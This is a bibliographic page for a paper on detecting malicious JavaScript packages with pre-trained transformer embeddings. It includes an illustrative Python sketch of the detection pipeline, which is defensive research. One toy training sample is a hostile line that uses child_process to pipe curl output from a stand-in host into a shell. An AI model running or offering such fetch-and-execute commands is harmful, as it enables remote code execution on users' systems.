Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages

The widespread reuse of open-source software has led to a significant increase in software supply chain attacks, and the sheer volume of available packages makes malicious ones increasingly hard to identify. Traditional static analysis methods often fall short in detecting these threats due to the complexity and diversity of code semantics. This paper addresses these challenges by building on the success of transformer models in understanding code semantics. We propose a novel approach that uses pre-trained transformer models to embed source code and then trains classifiers on these embeddings. This methodology enables a more nuanced understanding of code semantics and significantly improves the detection of malicious packages. In extensive experiments, our approach achieves F1-scores as high as 0.98 and an alert rate of 0.09%, demonstrating its effectiveness in detecting malicious code within open-source software supply chains.
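The embed-then-classify pipeline described in the abstract can be illustrated with a minimal, self-contained sketch. Everything in it is an assumption made for illustration and not the authors' implementation: `embed` is a hashed bag-of-tokens stand-in for a pre-trained transformer encoder, `NearestCentroid` is a toy classifier, and `alert_rate` is assumed here to mean the fraction of inspected samples that get flagged. The JavaScript snippets in the usage part are made-up toy inputs.

```python
import hashlib
import math
import re
from typing import Dict, List, Sequence

DIM = 64  # hypothetical embedding width; real encoders use far more dimensions


def embed(source: str, dim: int = DIM) -> List[float]:
    """Stand-in for a pre-trained encoder: hashed token counts, L2-normalised."""
    vec = [0.0] * dim
    for token in re.findall(r"[A-Za-z_$][\w$]*|\S", source):
        digest = hashlib.sha256(token.encode("utf-8")).digest()
        vec[int.from_bytes(digest[:4], "big") % dim] += 1.0
    norm = math.sqrt(sum(v * v for v in vec)) or 1.0  # avoid dividing by zero
    return [v / norm for v in vec]


class NearestCentroid:
    """Toy classifier: assigns each vector the label of the closest class mean."""

    def fit(self, X: Sequence[Sequence[float]], y: Sequence[int]) -> "NearestCentroid":
        sums: Dict[int, List[float]] = {}
        counts: Dict[int, int] = {}
        for vec, label in zip(X, y):
            acc = sums.setdefault(label, [0.0] * len(vec))
            for i, v in enumerate(vec):
                acc[i] += v
            counts[label] = counts.get(label, 0) + 1
        self.centroids = {
            label: [v / counts[label] for v in acc] for label, acc in sums.items()
        }
        return self

    def predict(self, X: Sequence[Sequence[float]]) -> List[int]:
        return [
            min(self.centroids, key=lambda lab: math.dist(vec, self.centroids[lab]))
            for vec in X
        ]


def f1_score(y_true: Sequence[int], y_pred: Sequence[int]) -> float:
    """F1 for the positive (malicious = 1) class."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    denom = 2 * tp + fp + fn
    return 2 * tp / denom if denom else 0.0


def alert_rate(y_pred: Sequence[int]) -> float:
    """Assumed definition: share of inspected samples flagged as malicious."""
    return sum(y_pred) / len(y_pred) if y_pred else 0.0


if __name__ == "__main__":
    # Made-up toy snippets; label 1 = malicious, 0 = benign.
    train = [
        ("module.exports = (a, b) => a + b;", 0),
        ("require('child_process').exec('curl http://example.invalid | sh');", 1),
    ]
    clf = NearestCentroid().fit([embed(src) for src, _ in train], [lab for _, lab in train])
    preds = clf.predict([embed("exports.mul = (a, b) => a * b;")])
    print("predictions:", preds, "alert rate:", alert_rate(preds))
```

In a realistic setup, `embed` would be replaced by the output of a pre-trained code model and the toy classifier by a trained one; the surrounding structure (embed each sample, fit on labelled vectors, score with F1 and alert rate) would stay the same.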

Ohm, Marc; Götz, Anja (2024): Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages. INFORMATIK 2024. DOI: 10.18420/inf2024_40. Bonn: Gesellschaft für Informatik e.V. ISSN: 2944-7682. PISSN: 1617-5468. EISSN: 2944-7682. ISBN: 978-3-88579-746-3. pp. 529-538. Safety in Bytes. Wiesbaden. 24-26 September 2024

Keywords

Transformers, Malicious Packages, Software Supply Chain

DOI

10.18420/inf2024_40

Collections

P352 - INFORMATIK 2024 - Lock in or log out? Wie digitale Souveränität gelingt
